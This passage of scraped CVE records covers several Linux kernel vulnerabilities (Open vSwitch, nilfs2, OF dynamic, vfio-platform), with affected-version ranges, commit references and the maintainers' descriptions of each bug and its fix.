"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: fix overwriting ct original tuple for ICMPv6\n\nOVS_PACKET_CMD_EXECUTE has 3 main attributes:\n - OVS_PACKET_ATTR_KEY - Packet metadata in a netlink format.\n - OVS_PACKET_ATTR_PACKET - Binary packet content.\n - OVS_PACKET_ATTR_ACTIONS - Actions to execute on the packet.\n\nOVS_PACKET_ATTR_KEY is parsed first to populate sw_flow_key structure\nwith the metadata like conntrack state, input port, recirculation id,\netc. Then the packet itself gets parsed to populate the rest of the\nkeys from the packet headers.\n\nWhenever the packet parsing code starts parsing the ICMPv6 header, it\nfirst zeroes out fields in the key corresponding to Neighbor Discovery\ninformation even if it is not an ND packet.\n\nIt is an \u0027ipv6.nd\u0027 field. However, the \u0027ipv6\u0027 is a union that shares\nthe space between \u0027nd\u0027 and \u0027ct_orig\u0027 that holds the original tuple\nconntrack metadata parsed from the OVS_PACKET_ATTR_KEY.\n\nND packets should not normally have conntrack state, so it\u0027s fine to\nshare the space, but normal ICMPv6 Echo packets or maybe other types of\nICMPv6 can have the state attached and it should not be overwritten.\n\nThe issue results in all but the last 4 bytes of the destination\naddress being wiped from the original conntrack tuple leading to\nincorrect packet matching and potentially executing wrong actions\nin case this packet recirculates within the datapath or goes back\nto userspace.\n\nND fields should not be accessed in non-ND packets, so not clearing\nthem should be fine. Executing memset() only for actual ND packets to\navoid the issue.\n\nInitializing the whole thing before parsing is needed because ND packet\nmay not contain all the options.\n\nThe issue only affects the OVS_PACKET_CMD_EXECUTE path and doesn\u0027t\naffect packets entering OVS datapath from network interfaces, because\nin this case CT metadata is populated from skb after the packet is\nalready parsed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:04.228Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6a51ac92bf35d34b4996d6eb67e2fe469f573b11"
},
{
"url": "https://git.kernel.org/stable/c/0b532f59437f688563e9c58bdc1436fefa46e3b5"
},
{
"url": "https://git.kernel.org/stable/c/5ab6aecbede080b44b8e34720ab72050bf1e6982"
},
{
"url": "https://git.kernel.org/stable/c/483eb70f441e2df66ade78aa7217e6e4caadfef3"
},
{
"url": "https://git.kernel.org/stable/c/9ec8b0ccadb908d92f7ee211a4eff05fd932f3f6"
},
{
"url": "https://git.kernel.org/stable/c/78741b4caae1e880368cb2f5110635f3ce45ecfd"
},
{
"url": "https://git.kernel.org/stable/c/431e9215576d7b728f3f53a704d237a520092120"
},
{
"url": "https://git.kernel.org/stable/c/d73fb8bddf89503c9fae7c42e50d44c89909aad6"
},
{
"url": "https://git.kernel.org/stable/c/7c988176b6c16c516474f6fceebe0f055af5eb56"
}
],
"title": "net: openvswitch: fix overwriting ct original tuple for ICMPv6",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38558",
"datePublished": "2024-06-19T13:35:28.226Z",
"dateReserved": "2024-06-18T19:36:34.921Z",
"dateUpdated": "2025-11-04T17:21:25.696Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26955 (GCVE-0-2024-26955)
Vulnerability from cvelistv5
Published
2024-05-01 05:18
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: prevent kernel bug at submit_bh_wbc()
Fix a bug where nilfs_get_block() returns a successful status when
searching and inserting the specified block both fail inconsistently. If
this inconsistent behavior is not due to a previously fixed bug, then an
unexpected race is occurring, so return a temporary error -EAGAIN instead.
This prevents callers such as __block_write_begin_int() from requesting a
read into a buffer that is not mapped, which would cause the BUG_ON check
for the BH_Mapped flag in submit_bh_wbc() to fail.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b Version: 1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26955",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:51:47.841182Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:21.638Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.746Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91e4c4595fae5e87069e44687ae879091783c183"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32eaee72e96590a75445c8a6c7c1057673b47e07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0fe7ad5aff4f0fcf988913313c497de85f1e186"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca581d237f3b8539c044205bb003de71d75d227c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/192e9f9078c96be30b31c4b44d6294b24520fce5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c8aa4cfda4e4adb15d5b6536d155eca9c9cd44c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/48d443d200237782dc82e6b60663ec414ef02e39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76ffbe911e2798c7296968f5fd72f7bf67207a8d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/269cdf353b5bdd15f1a079671b0f889113865f20"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "91e4c4595fae5e87069e44687ae879091783c183",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "32eaee72e96590a75445c8a6c7c1057673b47e07",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "f0fe7ad5aff4f0fcf988913313c497de85f1e186",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "ca581d237f3b8539c044205bb003de71d75d227c",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "192e9f9078c96be30b31c4b44d6294b24520fce5",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "0c8aa4cfda4e4adb15d5b6536d155eca9c9cd44c",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "48d443d200237782dc82e6b60663ec414ef02e39",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "76ffbe911e2798c7296968f5fd72f7bf67207a8d",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
},
{
"lessThan": "269cdf353b5bdd15f1a079671b0f889113865f20",
"status": "affected",
"version": "1f5abe7e7dbcd83e73212c6cb135a6106cea6a0b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: prevent kernel bug at submit_bh_wbc()\n\nFix a bug where nilfs_get_block() returns a successful status when\nsearching and inserting the specified block both fail inconsistently. If\nthis inconsistent behavior is not due to a previously fixed bug, then an\nunexpected race is occurring, so return a temporary error -EAGAIN instead.\n\nThis prevents callers such as __block_write_begin_int() from requesting a\nread into a buffer that is not mapped, which would cause the BUG_ON check\nfor the BH_Mapped flag in submit_bh_wbc() to fail."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:38.073Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/91e4c4595fae5e87069e44687ae879091783c183"
},
{
"url": "https://git.kernel.org/stable/c/32eaee72e96590a75445c8a6c7c1057673b47e07"
},
{
"url": "https://git.kernel.org/stable/c/f0fe7ad5aff4f0fcf988913313c497de85f1e186"
},
{
"url": "https://git.kernel.org/stable/c/ca581d237f3b8539c044205bb003de71d75d227c"
},
{
"url": "https://git.kernel.org/stable/c/192e9f9078c96be30b31c4b44d6294b24520fce5"
},
{
"url": "https://git.kernel.org/stable/c/0c8aa4cfda4e4adb15d5b6536d155eca9c9cd44c"
},
{
"url": "https://git.kernel.org/stable/c/48d443d200237782dc82e6b60663ec414ef02e39"
},
{
"url": "https://git.kernel.org/stable/c/76ffbe911e2798c7296968f5fd72f7bf67207a8d"
},
{
"url": "https://git.kernel.org/stable/c/269cdf353b5bdd15f1a079671b0f889113865f20"
}
],
"title": "nilfs2: prevent kernel bug at submit_bh_wbc()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26955",
"datePublished": "2024-05-01T05:18:51.866Z",
"dateReserved": "2024-02-19T14:20:24.200Z",
"dateUpdated": "2025-05-04T09:00:38.073Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35879 (GCVE-0-2024-35879)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
of: dynamic: Synchronize of_changeset_destroy() with the devlink removals
In the following sequence:
1) of_platform_depopulate()
2) of_overlay_remove()
During the step 1, devices are destroyed and devlinks are removed.
During the step 2, OF nodes are destroyed but
__of_changeset_entry_destroy() can raise warnings related to missing
of_node_put():
ERROR: memory leak, expected refcount 1 instead of 2 ...
Indeed, during the devlink removals performed at step 1, the removal
itself releasing the device (and the attached of_node) is done by a job
queued in a workqueue and so, it is done asynchronously with respect to
function calls.
When the warning is present, of_node_put() will be called but wrongly
too late from the workqueue job.
In order to be sure that any ongoing devlink removals are done before
the of_node destruction, synchronize the of_changeset_destroy() with the
devlink removals.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d007150b4e15bfcb8d36cfd88a5645d42e44d383 Version: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f Version: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f Version: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f Version: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f Version: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f Version: 252c23915546863685ecc68cb3a39e7e80c6c9d4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35879",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:13:02.160768Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:31.403Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.046Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3127b2ee50c424a96eb3559fbb7b43cf0b111c7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ee2424107546d882e1ddd75333ca9c32879908c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7b6df050c45a1ea158fd50bc32a8e1447dd1e951"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/801c8b8ec5bfb3519566dff16a5ecd48302fca82"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae6d76e4f06c37a623e357e79d49b17411db6f5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8917e7385346bd6584890ed362985c219fe6ae84"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/of/dynamic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3127b2ee50c424a96eb3559fbb7b43cf0b111c7a",
"status": "affected",
"version": "d007150b4e15bfcb8d36cfd88a5645d42e44d383",
"versionType": "git"
},
{
"lessThan": "3ee2424107546d882e1ddd75333ca9c32879908c",
"status": "affected",
"version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
"versionType": "git"
},
{
"lessThan": "7b6df050c45a1ea158fd50bc32a8e1447dd1e951",
"status": "affected",
"version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
"versionType": "git"
},
{
"lessThan": "801c8b8ec5bfb3519566dff16a5ecd48302fca82",
"status": "affected",
"version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
"versionType": "git"
},
{
"lessThan": "ae6d76e4f06c37a623e357e79d49b17411db6f5c",
"status": "affected",
"version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
"versionType": "git"
},
{
"lessThan": "8917e7385346bd6584890ed362985c219fe6ae84",
"status": "affected",
"version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
"versionType": "git"
},
{
"status": "affected",
"version": "252c23915546863685ecc68cb3a39e7e80c6c9d4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/of/dynamic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: dynamic: Synchronize of_changeset_destroy() with the devlink removals\n\nIn the following sequence:\n 1) of_platform_depopulate()\n 2) of_overlay_remove()\n\nDuring the step 1, devices are destroyed and devlinks are removed.\nDuring the step 2, OF nodes are destroyed but\n__of_changeset_entry_destroy() can raise warnings related to missing\nof_node_put():\n ERROR: memory leak, expected refcount 1 instead of 2 ...\n\nIndeed, during the devlink removals performed at step 1, the removal\nitself releasing the device (and the attached of_node) is done by a job\nqueued in a workqueue and so, it is done asynchronously with respect to\nfunction calls.\nWhen the warning is present, of_node_put() will be called but wrongly\ntoo late from the workqueue job.\n\nIn order to be sure that any ongoing devlink removals are done before\nthe of_node destruction, synchronize the of_changeset_destroy() with the\ndevlink removals."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:59.140Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3127b2ee50c424a96eb3559fbb7b43cf0b111c7a"
},
{
"url": "https://git.kernel.org/stable/c/3ee2424107546d882e1ddd75333ca9c32879908c"
},
{
"url": "https://git.kernel.org/stable/c/7b6df050c45a1ea158fd50bc32a8e1447dd1e951"
},
{
"url": "https://git.kernel.org/stable/c/801c8b8ec5bfb3519566dff16a5ecd48302fca82"
},
{
"url": "https://git.kernel.org/stable/c/ae6d76e4f06c37a623e357e79d49b17411db6f5c"
},
{
"url": "https://git.kernel.org/stable/c/8917e7385346bd6584890ed362985c219fe6ae84"
}
],
"title": "of: dynamic: Synchronize of_changeset_destroy() with the devlink removals",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35879",
"datePublished": "2024-05-19T08:34:36.450Z",
"dateReserved": "2024-05-17T13:50:33.111Z",
"dateUpdated": "2025-05-04T12:55:59.140Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26813 (GCVE-0-2024-26813)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/platform: Create persistent IRQ handlers
The vfio-platform SET_IRQS ioctl currently allows loopback triggering of
an interrupt before a signaling eventfd has been configured by the user,
which thereby allows a NULL pointer dereference.
Rather than register the IRQ relative to a valid trigger, register all
IRQs in a disabled state in the device open path. This allows mask
operations on the IRQ to nest within the overall enable state governed
by a valid eventfd signal. This decouples @masked, protected by the
@locked spinlock from @trigger, protected via the @igate mutex.
In doing so, it's guaranteed that changes to @trigger cannot race the
IRQ handlers because the IRQ handler is synchronously disabled before
modifying the trigger, and loopback triggering of the IRQ via ioctl is
safe due to serialization with trigger changes via igate.
For compatibility, request_irq() failures are maintained to be local to
the SET_IRQS ioctl rather than a fatal error in the open device path.
This allows, for example, a userspace driver with polling mode support
to continue to work regardless of moving the request_irq() call site.
This necessarily blocks all SET_IRQS access to the failed index.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 Version: 57f972e2b341dd6a73533f9293ec55d584a5d833 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.615Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09452c8fcbd7817c06e8e3212d99b45917e603a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cc5838f19d39a5fef04c468199699d2a4578be3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7932db06c82c5b2f42a4d1a849d97dba9ce4a362"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62d4e43a569b67929eb3319780be5359694c8086"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d6bedd6acc0bcb1e7e010bc046032e47f08d379f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f8d8f9c2173a541812dd750529f4a415117eb29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/675daf435e9f8e5a5eab140a9864dfad6668b375"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26813",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:50:36.972269Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:44.149Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/platform/vfio_platform_irq.c"
],
